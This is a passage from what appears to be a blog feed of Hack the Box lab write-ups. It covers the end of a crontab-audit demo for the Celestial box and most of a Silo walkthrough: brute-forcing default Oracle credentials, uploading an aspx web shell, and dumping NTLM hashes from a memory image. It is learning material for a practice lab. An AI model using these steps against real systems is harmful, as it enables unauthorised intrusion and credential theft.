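            if reason:
                findings[path] = (schedule, reason)
    return findings


def demo():
    """Rebuild the Celestial layout in a temp dir (constructed sample) and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        docs = os.path.join(tmp, "home", "sun", "Documents")
        root_dir = os.path.join(tmp, "root")
        os.makedirs(docs)
        os.makedirs(root_dir)
        user_script = os.path.join(docs, "script.py")
        root_copy = os.path.join(root_dir, "script.py")
        for p in (user_script, root_copy):
            with open(p, "w") as fh:
                fh.write('print "Script is running..."\n')
        os.chmod(user_script, 0o664)      # -rw-rw-r-- like the box
        os.chmod(root_copy, 0o644)        # -rw-r--r-- like a root-owned copy
        # Same job shape as root's crontab on the box, minus the output redirect.
        crontab = "# m h dom mon dow command\n"
        crontab += "*/5 * * * * python %s; cp %s %s; chown sun:sun %s\n" % (
            user_script, root_copy, user_script, user_script)
        # In the sandbox the current user stands in for root as file owner.
        findings = audit_crontab(crontab, trusted_uids=(0, os.getuid()))
        return {os.path.relpath(p, tmp): r for p, r in findings.items()}


if __name__ == "__main__":
    for path, (schedule, reason) in demo().items():
        print(schedule, path, reason)
```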
&lt;/div&gt;</content><author><name>A Medic (@OnlyaMedic)</name></author><category term="writeup" /><category term="pentesting" /><category term="hackthebox" /><summary type="html">Introduction Celestial was an interesting but very straight forward box. I personally believe Celestial was a good HTB box for learning how to perform quick research to tackle a specific vulnerability in an application that you may not encounter often. As one of the first boxes I completed when I first joined HTB it’s sad to see it go.</summary></entry><entry><title type="html">Hack the Box - Silo Write up</title><link href="https://dastinia.io/write-up/hackthebox/2018/08/04/hackthebox-silo-writeup/" rel="alternate" type="text/html" title="Hack the Box - Silo  Write up" /><published>2018-08-04T00:00:00-04:00</published><updated>2018-08-04T00:00:00-04:00</updated><id>https://dastinia.io/write-up/hackthebox/2018/08/04/hackthebox-silo-writeup</id><content type="html" xml:base="https://dastinia.io/write-up/hackthebox/2018/08/04/hackthebox-silo-writeup/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;/h2&gt;

&lt;p align=&quot;center&quot;&gt;
&lt;img src=&quot;https://dastinia.io/assets/images/htb/silo/1.png&quot; alt=&quot;silo&quot; /&gt;
&lt;/p&gt;

&lt;p&gt;This is probably one of the few times I voluntarily attempted to take a crack at attacking an Oracle database server. I’ve had a little experience messing around with Oracle databases at work, but I can’t say I knew much, or anything at all, about them. This box was pretty valuable to me since I got to learn some techniques and tactics for attacking Oracle databases. Once you got over the first hurdle, Silo wasn’t an overly obtuse box.&lt;/p&gt;

&lt;h2 id=&quot;tools-used&quot;&gt;Tools Used&lt;/h2&gt;
&lt;ul&gt;
  &lt;li&gt;&lt;a href=&quot;https://nmap.org/&quot;&gt;Nmap&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/rapid7/metasploit-framework&quot;&gt;Metasploit Framework&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.offensive-security.com/metasploit-unleashed/msfvenom/&quot;&gt;Msfvenom&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://github.com/CoreSecurity/impacket&quot;&gt;Impacket&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;&lt;a href=&quot;https://www.volatilityfoundation.org/&quot;&gt;Volatility&lt;/a&gt;&lt;/li&gt;
  &lt;li&gt;pth-winexe&lt;/li&gt;
&lt;/ul&gt;

&lt;h2 id=&quot;enumeration&quot;&gt;Enumeration&lt;/h2&gt;

&lt;h3 id=&quot;initial-scanning&quot;&gt;Initial Scanning&lt;/h3&gt;
&lt;p&gt;Like with every box, let’s begin with a scan of the machine Silo (10.10.10.82). I’ve started to really enjoy using HTB Alamot’s &lt;a href=&quot;https://github.com/Alamot/code-snippets/blob/master/enum/htbscan.py&quot;&gt;htbscan.py&lt;/a&gt; script.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;# Nmap 7.70 scan initiated Sun Jun 24 11:48:59 2018 as: nmap -sV -A -v -p49158,49153,1521,80,139,49161,49160,5985,49155,135,49154,49162,47001,445 -oA nmap/open_ports 10.10.10.82
Nmap scan report for 10.10.10.82
Host is up (0.15s latency).

PORT      STATE SERVICE      VERSION
80/tcp    open  http         Microsoft IIS httpd 8.5
| http-methods:
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-title: IIS Windows Server
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp  open  oracle-tns   Oracle TNS listener 11.2.0.2.0 (unauthorized)
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49153/tcp open  msrpc        Microsoft Windows RPC
49154/tcp open  msrpc        Microsoft Windows RPC
49155/tcp open  msrpc        Microsoft Windows RPC
49158/tcp open  msrpc        Microsoft Windows RPC
49160/tcp open  oracle-tns   Oracle TNS listener (requires service name)
49161/tcp open  msrpc        Microsoft Windows RPC
49162/tcp open  msrpc        Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Aggressive OS guesses: Microsoft Windows Server 2012 (96%), Microsoft Windows Server 2012 R2 (96%), Microsoft Windows Server 2012 R2 Update 1 (96%), Microsoft Windows 7, Windows Server 2012, or Windows 8.1 Update 1 (96%), Microsoft Windows Vista SP1 (96%), Microsoft Windows Server 2012 or Server 2012 R2 (95%), Microsoft Windows Server 2008 SP2 Datacenter Version (94%), Microsoft Windows Server 2008 R2 (93%), Microsoft Windows Home Server 2011 (Windows Server 2008 R2) (93%), Microsoft Windows Server 2008 SP1 (93%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.074 days (since Sun Jun 24 10:05:06 2018)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 0s, median: -1s
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: supported
| smb2-security-mode:
|   2.02:
|_    Message signing enabled but not required
| smb2-time:
|   date: 2018-06-24 11:51:05
|_  start_date: 2018-06-24 10:05:23

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   155.91 ms 10.10.14.1
2   154.66 ms 10.10.10.82

Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jun 24 11:51:27 2018 -- 1 IP address (1 host up) scanned in 148.15 seconds
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We see some interesting services listening right off the bat that will be worth investigating: an Oracle TNS listener (Oracle database), SMB on port 445, and a web service.&lt;/p&gt;

&lt;h3 id=&quot;enumeration-1&quot;&gt;Enumeration&lt;/h3&gt;

&lt;h3 id=&quot;enumerating-iis---port-80&quot;&gt;Enumerating IIS - Port 80&lt;/h3&gt;

&lt;p&gt;We attempt to discover hidden directories or content, but that comes up with nothing valuable.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/htb/silo# gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u  http://10.10.10.82 -x asp,aspx -s 200,204,301,302,307,403 -t 100 | tee gobuster_silo

Gobuster v1.2                OJ Reeves (@TheColonial)
=====================================================
[+] Mode         : dir
[+] Url/Domain   : http://10.10.10.82/
[+] Threads      : 100
[+] Wordlist     : /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes : 301,302,307,403,200,204
[+] Extensions   : .asp,.aspx
=====================================================
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h3 id=&quot;enumerating-oracle-db---port-1521&quot;&gt;Enumerating Oracle DB - Port 1521&lt;/h3&gt;

&lt;p&gt;I wrote a quick &lt;a href=&quot;https://dastinia.io/tutorial/2018/07/31/installing-oracle-database-attacking-tool-on-kali/&quot;&gt;ODAT installation tutorial&lt;/a&gt; a few days prior, since some people were having issues installing ODAT on Kali.&lt;/p&gt;

&lt;p&gt;ODAT is an open source penetration testing tool for attacking and auditing the security of Oracle Database servers.&lt;/p&gt;

&lt;p&gt;I then read up on some Oracle Database attack methodologies:&lt;/p&gt;

&lt;p&gt;[1] - &lt;a href=&quot;https://www.slideshare.net/martintoshev/oracle-database-12c-attack-vectors&quot;&gt;https://www.slideshare.net/martintoshev/oracle-database-12c-attack-vectors&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;[2] - &lt;a href=&quot;https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/&quot;&gt;https://hackmag.com/uncategorized/looking-into-methods-to-penetrate-oracle-db/&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;[3] - &lt;a href=&quot;http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf&quot;&gt;http://www.blackhat.com/presentations/bh-usa-09/GATES/BHUSA09-Gates-OracleMetasploit-SLIDES.pdf&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;[4] - &lt;a href=&quot;http://pentestdiary.blogspot.com/2017/08/oracle-database-penetration-testing.html&quot;&gt;http://pentestdiary.blogspot.com/2017/08/oracle-database-penetration-testing.html&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;The general methodology I took away from them was that we needed to:&lt;/p&gt;
&lt;ol&gt;
  &lt;li&gt;Enumerate the Oracle Database version&lt;/li&gt;
  &lt;li&gt;Discover &lt;a href=&quot;https://stackoverflow.com/questions/43866/how-sid-is-different-from-service-name-in-oracle-tnsnames-ora&quot;&gt;SIDs&lt;/a&gt; (basically Oracle’s name for a unique ‘database instance’)&lt;/li&gt;
  &lt;li&gt;Obtain a user account (likely through brute-forcing)&lt;/li&gt;
  &lt;li&gt;Exploit / escalate privileges as needed&lt;/li&gt;
  &lt;li&gt;Repeat&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;From our Nmap scan we already know that the Oracle database is running version &lt;code class=&quot;highlighter-rouge&quot;&gt;11.2.0.2.0&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;We can use ODAT’s &lt;code class=&quot;highlighter-rouge&quot;&gt;sidguesser&lt;/code&gt; module to discover valid SIDs.&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/odat# ./odat.py sidguesser -s 10.10.10.82

[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'SAMPLE' is a valid SID. Continue...
[+] 'SCAN4' is a valid SID. Continue...
[+] 'XE' is a valid SID. Continue...
[+] 'XEXDB' is a valid SID. Continue...
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:10:55
[1.2] Searching valid SIDs thanks to a brute-force attack on 1 chars now (10.10.10.82:1521)
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:00:12
[1.3] Searching valid SIDs thanks to a brute-force attack on 2 chars now (10.10.10.82:1521)
[+] 'XE' is a valid SID. Continue...
100% |###################################################################################################################################################################################################################################################################################################| Time: 00:07:31
[+] SIDs found on the 10.10.10.82:1521 server: SAMPLE,SCAN4,XE,XEXDB
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;We can use the Metasploit module &lt;code class=&quot;highlighter-rouge&quot;&gt;admin/oracle/oracle_login&lt;/code&gt; to brute-force default Oracle accounts against the discovered &lt;code class=&quot;highlighter-rouge&quot;&gt;XE&lt;/code&gt; SID.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;msf &amp;gt; use admin/oracle/oracle_login
msf auxiliary(admin/oracle/oracle_login) &amp;gt;
msf auxiliary(admin/oracle/oracle_login) &amp;gt; options

Module options (auxiliary/admin/oracle/oracle_login):

   Name     Current Setting                                                              Required  Description
   ----     ---------------                                                              --------  -----------
   CSVFILE  /usr/share/metasploit-framework/data/wordlists/oracle_default_passwords.csv  no        The file that contains a list of default accounts.
   RHOST                                                                                 yes       The Oracle host.
   RPORT    1521                                                                         yes       The TNS port.
   SID      ORCL                                                                         yes       The sid to authenticate with.

msf auxiliary(admin/oracle/oracle_login) &amp;gt; set RHOST 10.10.10.82
RHOST =&amp;gt; 10.10.10.82
msf auxiliary(admin/oracle/oracle_login) &amp;gt; set SID XE
SID =&amp;gt; XE
msf auxiliary(admin/oracle/oracle_login) &amp;gt; run -j
[*] Auxiliary module running as background job 0.

[*] Starting brute force on 10.10.10.82:1521...
[+] Found user/pass of: scott/tiger on 10.10.10.82 with sid XE
[*] Auxiliary module execution completed
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;You will discover that there is a valid user account for &lt;code class=&quot;highlighter-rouge&quot;&gt;scott:tiger&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;We also discover that we can connect to the database as &lt;code class=&quot;highlighter-rouge&quot;&gt;SYSDBA&lt;/code&gt;.&lt;/p&gt;

&lt;p&gt;&lt;em&gt;failed connection as sysoper&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysoper

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:14:55 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.

ERROR:
ORA-01031: insufficient privileges


Enter user-name:
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;connecting as sysdba&lt;/em&gt;&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/odat# sqlplus SCOTT/tiger@10.10.10.82/XE as sysdba

SQL*Plus: Release 12.1.0.2.0 Production on Sat Aug 4 16:15:23 2018

Copyright (c) 1982, 2014, Oracle.  All rights reserved.


Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production

SQL&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;h2 id=&quot;exploitation&quot;&gt;Exploitation&lt;/h2&gt;

&lt;p&gt;Reading over the ODAT modules, there seemed to be a few we could leverage for code execution or arbitrary file upload/read.&lt;/p&gt;

&lt;p&gt;The ODAT developer was kind enough to provide a &lt;a href=&quot;https://github.com/quentinhardy/odat/wiki&quot;&gt;wiki&lt;/a&gt; of all the modules, with some examples:&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/quentinhardy/odat/wiki/utlfile&quot;&gt;utlfile&lt;/a&gt; - Allows us to upload files from our local machine to the remote server, or download files from it&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/quentinhardy/odat/wiki/externaltable&quot;&gt;externaltable&lt;/a&gt; - Allows us to execute a binary with the privileges of the Oracle database server (only if the binary is stored on the server)&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/quentinhardy/odat/wiki/ctxsys&quot;&gt;ctxsys&lt;/a&gt; - Read a file from the database server&lt;/p&gt;

&lt;p&gt;&lt;a href=&quot;https://github.com/quentinhardy/odat/wiki/dbmsadvisor&quot;&gt;dbmsadvisor&lt;/a&gt; - Upload a file to the database server&lt;/p&gt;

&lt;p&gt;So some attack paths we can take:&lt;/p&gt;

&lt;ol&gt;
  &lt;li&gt;Since a web service is running on the box we can upload a web shell (aspx) to interact with the server&lt;/li&gt;
  &lt;li&gt;Upload binary payload like something generated with msfvenom, and execute it.&lt;/li&gt;
  &lt;li&gt;Read potentially sensitive files that we can use for further privilege escalation.&lt;/li&gt;
&lt;/ol&gt;

&lt;p&gt;I used the first method, since we will end up discovering that the Oracle database was running with &lt;code class=&quot;highlighter-rouge&quot;&gt;system&lt;/code&gt; privileges.&lt;/p&gt;

&lt;p&gt;I used the following aspx web shell, and uploaded it to the well-known default IIS web root directory &lt;code class=&quot;highlighter-rouge&quot;&gt;C:\inetpub\wwwroot&lt;/code&gt;.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:/opt/odat# ./odat.py utlfile -s 10.10.10.82 -d XE -U SCOTT -P tiger --putFile 'C:\inetpub\wwwroot\' 'shell.aspx' /root/htb/silo/silo_shell.aspx --sysdba

[1] (10.10.10.82:1521): Put the /root/htb/silo/silo_shell.aspx local file in the C:\inetpub\wwwroot\ folder like shell.aspx on the 10.10.10.82 server
[+] The /root/htb/silo/silo_shell.aspx file was created on the C:\inetpub\wwwroot\ directory on the 10.10.10.82 server like the shell.aspx file

&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/silo/3.png&quot; alt=&quot;&amp;quot;Silo Web shell&amp;quot;&quot; title=&quot;Silo Web shell&quot; /&gt;&lt;/p&gt;

&lt;p&gt;&lt;img src=&quot;https://dastinia.io/assets/images/htb/silo/2.png&quot; alt=&quot;&amp;quot;Dropbox Memory Dump Message&amp;quot;&quot; title=&quot;Dropbox Memory Dump Message&quot; /&gt;&lt;/p&gt;

&lt;h3 id=&quot;analyzing-memory-dump-with-volatility&quot;&gt;Analyzing Memory Dump with Volatility&lt;/h3&gt;

&lt;p&gt;We are given a Dropbox link and a password to access what appears to be a memory dump.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):

Dropbox link provided to vendor (and password under separate cover).

Dropbox link 
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0

link password:
£%Hm8646uC$
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;Let’s begin analyzing this memory dump by inspecting the processes.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 pslist
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Offset(V)          Name                    PID   PPID   Thds     Hnds   Sess  Wow64 Start                          Exit
------------------ -------------------- ------ ------ ------ -------- ------ ------ ------------------------------ ------------------------------
0xffffe00000089940 System                    4      0     84        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe00000c9c100 smss.exe                208      4      3        0 ------      0 2018-01-05 22:17:14 UTC+0000
0xffffe000034f54c0 csrss.exe               324    316     10        0      0      0 2018-01-05 22:17:15 UTC+0000
0xffffe000034ec380 csrss.exe               396    388     10        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe000034ac940 wininit.exe             404    316      4        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00002fee080 winlogon.exe            448    388      5        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003550940 services.exe            492    404     10        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003ed4080 lsass.exe               500    404      6        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f22500 svchost.exe             560    492     15        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f39940 svchost.exe             604    492     15        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f6f680 dwm.exe                 688    448      9        0      1      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003f68940 vmacthlp.exe            708    492      2        0      0      0 2018-01-05 22:17:16 UTC+0000
0xffffe00003fb9080 svchost.exe             764    492     16        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00003fcc940 svchost.exe             800    492     63        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00003fe3940 svchost.exe             832    492     20        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004e267c0 svchost.exe             920    492     25        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004e8d940 svchost.exe             340    492     16        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f2e940 spoolsv.exe             308    492     13        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f5c940 svchost.exe            1052    492     11        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004f84940 oracle.exe             1088    492     30        0      0      0 2018-01-05 22:17:17 UTC+0000
0xffffe00004fe93c0 OraClrAgnt.exe         1192    492      2        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004fef940 TNSLSNR.EXE            1208    492      5        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004ff0300 agtctl.exe             1216   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004ff3940 agtctl.exe             1264   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe00004ffc440 svchost.exe            1272    492      4        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe00004fff080 VGAuthService.         1324    492      3        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060568c0 agtctl.exe             1348   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe000060767c0 agtctl.exe             1388   1192      0 --------      0      0 2018-01-05 22:17:18 UTC+0000   2018-01-05 22:17:18 UTC+0000
0xffffe0000608f780 vmtoolsd.exe           1444    492      8        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060a62c0 ManagementAgen         1492    492      9        0      0      0 2018-01-05 22:17:18 UTC+0000
0xffffe000060c7940 svchost.exe            1516    492     16        0      0      0 2018-01-05 22:17:19 UTC+0000
0xffffe00003051940 svchost.exe            2000    492      5        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe00003077880 TPAutoConnSvc.         1256    492      8        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030a1080 dllhost.exe            1432    492     21        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030b7940 dllhost.exe            1600    492     17        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030cd940 WmiPrvSE.exe           1440    560     12        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe000030cf940 msdtc.exe              2052    492     13        0      0      0 2018-01-05 22:17:27 UTC+0000
0xffffe00003117940 VSSVC.exe              2228    492      7        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe00003149080 sppsvc.exe             2284    492      5        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe0000315f940 SppExtComObj.E         2312    560      5        0      0      0 2018-01-05 22:17:29 UTC+0000
0xffffe000061637c0 taskhostex.exe         2368    800      7        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00004e00680 explorer.exe           2424   2416     56        0      1      0 2018-01-05 22:17:33 UTC+0000
0xffffe00000df34c0 ServerManager.         2732   2376     24        0      1      0 2018-01-05 22:17:35 UTC+0000
0xffffe0000301c940 TPAutoConnect.         2824   1256      3        0      1      0 2018-01-05 22:17:37 UTC+0000
0xffffe00003f698c0 conhost.exe            2832   2824      1        0      1      0 2018-01-05 22:17:37 UTC+0000
0xffffe0000136d080 vmtoolsd.exe           2992   2424      8        0      1      0 2018-01-05 22:17:45 UTC+0000
0xffffe00003224540 WmiPrvSE.exe           3056    560     19        0      0      0 2018-01-05 22:17:47 UTC+0000
0xffffe00003239940 WmiPrvSE.exe           2340    560     10        0      0      0 2018-01-05 22:17:47 UTC+0000
0xffffe0000325c940 WmiApSrv.exe            864    492      5        0      0      0 2018-01-05 22:17:48 UTC+0000
0xffffe00003203340 DumpIt.exe             2932   2424      4        0      1      0 2018-01-05 22:18:06 UTC+0000
0xffffe00003f8c940 conhost.exe            2764   2932      2        0      1      0 2018-01-05 22:18:06 UTC+0000
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;It looks like the forensics tool &lt;code class=&quot;highlighter-rouge&quot;&gt;DumpIt&lt;/code&gt; was used to create this memory dump, which likely means it was taken with admin privileges.&lt;/p&gt;

&lt;p&gt;We can use the &lt;code class=&quot;highlighter-rouge&quot;&gt;hashdump&lt;/code&gt; Volatility module to dump the hashes of the accounts stored on the system. This is the equivalent of running &lt;code class=&quot;highlighter-rouge&quot;&gt;hashdump&lt;/code&gt; in meterpreter. We just need to get the virtual offsets of the &lt;code class=&quot;highlighter-rouge&quot;&gt;SYSTEM&lt;/code&gt; &amp;amp; &lt;code class=&quot;highlighter-rouge&quot;&gt;SAM&lt;/code&gt; hives with the &lt;code class=&quot;highlighter-rouge&quot;&gt;hivelist&lt;/code&gt; module first, which happen to be &lt;code class=&quot;highlighter-rouge&quot;&gt;0xffffc00000028000&lt;/code&gt; &amp;amp; &lt;code class=&quot;highlighter-rouge&quot;&gt;0xffffc00000619000&lt;/code&gt; respectively.&lt;/p&gt;

&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hivelist
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
0xffffc000011fb000 0x0000000034570000 \SystemRoot\System32\config\DRIVERS
0xffffc00001600000 0x000000003327b000 \??\C:\Windows\AppCompat\Programs\Amcache.hve
0xffffc0000001e000 0x0000000000b65000 [no name]
0xffffc00000028000 0x0000000000a70000 \REGISTRY\MACHINE\SYSTEM
0xffffc00000052000 0x000000001a25b000 \REGISTRY\MACHINE\HARDWARE
0xffffc000004de000 0x0000000024cf8000 \Device\HarddiskVolume1\Boot\BCD
0xffffc00000103000 0x000000003205d000 \SystemRoot\System32\Config\SOFTWARE
0xffffc00002c43000 0x0000000028ecb000 \SystemRoot\System32\Config\DEFAULT
0xffffc000061a3000 0x0000000027532000 \SystemRoot\System32\Config\SECURITY
0xffffc00000619000 0x0000000026cc5000 \SystemRoot\System32\Config\SAM
0xffffc0000060d000 0x0000000026c93000 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0xffffc000006cf000 0x000000002688f000 \SystemRoot\System32\Config\BBI
0xffffc000007e7000 0x00000000259a8000 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0xffffc00000fed000 0x000000000d67f000 \??\C:\Users\Administrator\ntuser.dat
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;

&lt;p&gt;&lt;em&gt;dumping hashes&lt;/em&gt;&lt;/p&gt;
&lt;div class=&quot;highlighter-rouge&quot;&gt;&lt;pre class=&quot;highlight&quot;&gt;&lt;code&gt;root@dastinia:~/Desktop# volatility -f SILO-20180105-221806.dmp --profile=Win2012R2x64 hashdump -y 0xffffc00000028000 -s 0xffffc00000619000
RuntimeError: module compiled against API version 0xb but this version of numpy is 0xa
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Phineas:1002:aad3b435b51404eeaad3b435b51404ee:8eacdd67b77749e65d3b3d5c110b0969:::
&lt;/code&gt;&lt;/pre&gt;
&lt;/div&gt;
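&lt;p&gt;As an added example (not code from the original write-up or from the Volatility project), the following Python parses the &lt;code class=&quot;highlighter-rouge&quot;&gt;hivelist&lt;/code&gt; output above to pick the SYSTEM and SAM offsets that &lt;code class=&quot;highlighter-rouge&quot;&gt;hashdump -y/-s&lt;/code&gt; expects, then triages the pwdump-style lines hashdump returns (blank-password and stored-LM-hash checks). It assumes the Volatility 2.6 text formats shown on this page; the sample strings are trimmed copies of the output above.&lt;/p&gt;

```python
"""Triage helpers for Volatility 2 'hivelist' and 'hashdump' output.

Added example for this write-up, not code from the original post or from
the Volatility project. It assumes the plain-text formats Volatility 2.6
prints (as shown in the write-up); the sample strings below are trimmed
copies of the write-up's own output.
"""
import re

# Well-known marker hashes that every Windows credential triage should recognise.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # placeholder: no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password ""

# hivelist rows: virtual offset, physical offset, hive name
HIVE_RE = re.compile(r"^(0x[0-9a-fA-F]+)\s+(0x[0-9a-fA-F]+)\s+(\S.*)$")
# pwdump-style rows: user:rid:lm:nt:::
HASH_RE = re.compile(r"^([^:]+):(\d+):([0-9a-fA-F]{32}):([0-9a-fA-F]{32}):::$")

HIVELIST_SAMPLE = r"""
Volatility Foundation Volatility Framework 2.6
Virtual            Physical           Name
------------------ ------------------ ----
0xffffc0000100a000 0x000000000d40e000 \??\C:\Users\Administrator\AppData\Local\Microsoft\Windows\UsrClass.dat
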